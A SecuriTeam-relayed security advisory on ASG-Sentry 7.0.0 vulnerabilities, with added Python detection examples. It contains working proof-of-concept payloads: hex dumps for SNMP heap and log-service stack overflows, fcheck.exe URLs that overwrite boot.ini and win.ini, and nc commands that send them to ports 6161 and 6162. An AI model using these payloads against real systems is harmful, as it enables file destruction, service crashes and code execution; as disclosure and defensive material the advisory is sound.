[NEWS] ASG-Sentry Multiple Vulnerabilities



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



ASG-Sentry Multiple Vulnerabilities
------------------------------------------------------------------------


SUMMARY

"The <http://www.asg-sentry.com> ASG-Sentry family of products is a suite
of tools strategically engineered to control, monitor, manage, and enhance
your network. Sentry's tools provide you with full visibility to your
network from any Web browser. Sentry also allows you to fully instrument
your company's applications, CPUs, disk space, memory, files, Windows and
UNIX platforms, and more." Multiple vulnerabilities have been discovered
in ASG-Sentry. They allow remote attackers to make the product delete
arbitrary files, crash it, and overflow an internal buffer, allowing the
execution of arbitrary code.

DETAILS

Vulnerable Systems:
* ASG-Sentry version 7.0.0

Arbitrary files deletion
The fcheck.exe (File Check Utility) CGI shipped with ASG handles index
files that contain a list of filenames and checksums.

The -b option of this utility creates such an index file: the caller
specifies the name of the output file and, optionally, the folder that
will be scanned recursively to find and read the files to add to the
list.

The first vulnerability is that an external attacker can use this CGI to
overwrite existing files, either with no data (by specifying a new folder,
which the program itself creates) or with the list of filenames described
above.

Naturally, the files can be specified both on local disks and on network
shares.

The second effect is that an attacker can occupy CPU and disk by making
the utility scan every file on the disk, simply by specifying, for
example, c:\ as the folder.

Heap-overflow in FxAgent
The FxAgent process running on UDP port 6161 is used for handling the
various SNMP requests. A community field longer than 64 bytes triggers a
heap overflow that an attacker can exploit.
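For the FxAgent issue, an added example (not code from the advisory or the vendor): a minimal BER walker that reads the standard SNMPv1/v2c message header and flags community strings longer than the 64-byte bound named above, or with a malformed length byte, as a sensor in front of UDP 6161 would. The sample messages are constructed; the 0xFF length in the MALFORMED sample mirrors the bytes 30 23 02 01 00 04 ff 41 that the asgulo_fxagent.txt dump below shows when its od words are read little-endian.

```python
# Added example (not from the advisory): a minimal BER walker that reads the
# SNMP header (SEQUENCE, version INTEGER, community OCTET STRING) and flags
# community strings over the 64-byte bound named for FxAgent, or with a
# malformed length. The sample messages are constructed, not captured.

def _read_length(buf, pos):
    """Decode a BER length at buf[pos]; return (length, next_pos).
    Rejects the indefinite form 0x80, the reserved byte 0xFF and truncation."""
    first = buf[pos]
    if first < 0x80:
        return first, pos + 1
    if first in (0x80, 0xFF):
        raise ValueError("invalid BER length byte 0x%02x" % first)
    n = first & 0x7F
    if pos + 1 + n > len(buf):
        raise ValueError("truncated long-form length")
    return int.from_bytes(buf[pos + 1:pos + 1 + n], "big"), pos + 1 + n

def community_length(msg):
    """Return the declared community-string length of an SNMPv1/v2c message.
    Raises ValueError on a bad tag or length, IndexError if msg is too short."""
    if not msg or msg[0] != 0x30:
        raise ValueError("not an SNMP SEQUENCE")
    _, pos = _read_length(msg, 1)
    if msg[pos] != 0x02:
        raise ValueError("expected version INTEGER")
    vlen, pos = _read_length(msg, pos + 1)
    pos += vlen
    if msg[pos] != 0x04:
        raise ValueError("expected community OCTET STRING")
    clen, pos = _read_length(msg, pos + 1)
    if pos + clen > len(msg):
        raise ValueError("community length exceeds message")
    return clen

def is_suspicious(msg, limit=64):
    """True when the community exceeds `limit` bytes or the header is malformed."""
    try:
        return community_length(msg) > limit
    except (ValueError, IndexError):
        return True

# Constructed samples: a normal "public" header, a 72-byte community, and a
# header whose community length byte is 0xFF, the shape the advisory's
# asgulo_fxagent.txt dump shows (bytes 30 23 02 01 00 04 ff 41 ...).
NORMAL = b"\x30\x0b\x02\x01\x00\x04\x06public"
OVERSIZED = b"\x30\x4d\x02\x01\x00\x04\x48" + b"A" * 72
MALFORMED = b"\x30\x23\x02\x01\x00\x04\xff" + b"A" * 40
```

A malformed length is treated as suspicious rather than ignored, because a parser that silently accepts it is exactly what lets an oversized community reach the vulnerable copy.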

Termination of FxIAList
FxIAList is a service that listens on TCP port 6162 and handles logging
operations: the commands "exit", "trace on", "verbose" and "trace off",
and the name of the log file to create (xxxx.xx.xx) together with its
content. The main problem is that the server requires no authentication,
so anyone can send the "exit" command and the service will simply
terminate.

Buffer overflow in FxIAList
The same service is also affected by a stack-based buffer overflow, which
occurs when the data to be written to the log file (up to 1023 bytes) is
copied into a buffer of only 500 bytes.

Exploits:
asgulo_fxagent.txt:
0000000 2330 0102 0400 41ff 4141 4141 4141 4141
0000010 4141 4141 4141 4141 4141 4141 4141 4141
*
0000100 4141 4141 4141 16a1 0102 0236 0001 0102
0000110 3000 300b 0609 2b05 0106 0102 0005
000011e

asgulo-ialist1.txt:
0000000 7865 7469
0000004

asgulo-ialist2.txt:
0000000 3231 3433 3635 3837 4141 4141 4141 4141
0000010 4141 4141 4141 4141 4141 4141 4141 4141
*
00003f0 4141 4141 4141 4141 4141 4141 7c41 007c
00003ff

Arbitrary files deletion
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+..\../..\boot.ini
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+c:\windows\win.ini
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+c:\file.txt+c:\
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+\host\document.txt
The single backslash in the network-share link is intentional: Apache
doubles every backslash, so the argument becomes \\host\\document.txt.
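For the fcheck.exe file-overwrite issue described above and the request shapes just listed, an added example (not code from the advisory or the vendor): a Python scanner for Apache-style access-log lines that picks out requests to /snmx-cgi/fcheck.exe carrying -b and classifies where the named output file points (traversal, network share, absolute drive path). The log lines are constructed; the CGI path and the '+'-separated argument form are taken from the URLs above.

```python
import re
from urllib.parse import unquote

# Added example (not from the advisory): flag access-log requests to the
# ASG-Sentry fcheck.exe CGI that pass -b and classify the output path they
# name. The log lines below are constructed in Apache common log format.
REQ_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<url>\S+)')

def fcheck_args(line):
    """Return (src, args) for a request to /snmx-cgi/fcheck.exe, else None.
    Old-style CGI argv: '+' separates arguments and %XX escapes are decoded."""
    m = REQ_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("url").partition("?")
    if not path.lower().endswith("/snmx-cgi/fcheck.exe"):
        return None
    return m.group("src"), [unquote(a) for a in query.split("+") if a]

def classify_target(path):
    """Label a -b output path: missing, traversal, unc, absolute or relative."""
    if not path:
        return "missing"
    parts = path.replace("/", "\\").split("\\")
    if ".." in parts:
        return "traversal"
    if parts[0] == "":  # leading backslash, e.g. \host\file (network share)
        return "unc"
    if re.match(r"^[A-Za-z]:$", parts[0]):
        return "absolute"
    return "relative"

def find_overwrites(lines):
    """Yield (src, target, kind) for each -b request; target is the file the
    CGI would create or truncate (the first argument after -b)."""
    for line in lines:
        parsed = fcheck_args(line)
        if parsed and "-b" in parsed[1]:
            src, args = parsed
            i = args.index("-b") + 1
            target = args[i] if i < len(args) else ""
            yield src, target, classify_target(target)

SAMPLE_LOG = [  # constructed, mirroring the advisory's URL shapes
    '10.0.0.5 - - [01/Jan/2005:10:00:00 +0000] "GET /snmx-cgi/fcheck.exe?-b+..%5C../..%5Cboot.ini HTTP/1.0" 200 12',
    '10.0.0.5 - - [01/Jan/2005:10:00:01 +0000] "GET /snmx-cgi/fcheck.exe?-b+c:%5Cfile.txt+c:%5C HTTP/1.0" 200 12',
    '10.0.0.6 - - [01/Jan/2005:10:00:02 +0000] "GET /snmx-cgi/fcheck.exe?-b+%5Chost%5Cdocument.txt HTTP/1.0" 200 12',
    '10.0.0.7 - - [01/Jan/2005:10:00:03 +0000] "GET /snmx-cgi/index.html HTTP/1.0" 200 512',
]
```

Any -b request from outside the management network is worth an alert regardless of classification, since the CGI creates or truncates the named file without authentication.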

Heap-overflow in FxAgent
nc SERVER 6161 -v -v -u < asgulo_fxagent.txt

Termination of FxIAList
nc SERVER 6162 -v -v -w 1 < asgulo-ialist1.txt

Buffer overflow in FxIAList
nc SERVER 6162 -v -v -w 1 < asgulo-ialist2.txt


ADDITIONAL INFORMATION

The information has been provided by <mailto:aluigi@xxxxxxxxxxxxx> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/asgulo-adv.txt>




